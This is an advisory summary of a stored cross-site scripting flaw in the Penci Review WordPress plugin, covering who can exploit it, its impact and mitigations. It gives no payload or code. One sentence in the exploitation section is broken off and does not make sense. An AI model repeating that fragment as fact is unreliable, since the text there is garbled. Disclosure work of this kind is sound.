CVE-2026-24600

Vulnerability

Overview

The Penci Review plugin for WordPress versions 3.5 and earlier contains a Stored Cross-Site Scripting (XSS) vulnerability due to improper neutralization of user-supplied input during web page generation [1]. This flaw allows an authenticated attacker with contributor-level access or higher to inject malicious scripts that are stored on the server and executed in the browsers of visitors.

Exploitation

Details

To exploit this vulnerability, an attacker must first authenticate as a user with the ability to submit or edit reviews (typically a contributor or above). The attacker then crafts a review containing a malicious payload, such as JavaScript code, which is not properly sanitized by the plugin. When a stored XSS attack [1]. No additional user interaction is required for the initial injection, but the payload is triggered when any visitor (including administrators) views the affected page.

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's browser. This can be used to steal session cookies, redirect users to phishing sites, deface the website, or inject advertisements [1]. The advisory notes that such vulnerabilities are frequently used in mass-exploit campaigns targeting thousands of WordPress sites regardless of size or popularity [1].

Mitigation

The vendor has not released a patched version at the time of publication. The recommended immediate action is to update the plugin to a secure version once available. If updating is not possible, users should restrict contributor access or disable the plugin, or consult with a hosting provider or web developer for alternative mitigations [1]. The CVSS score of 6.5 (Medium) reflects the need for authenticated access but the potential for widespread automated attacks.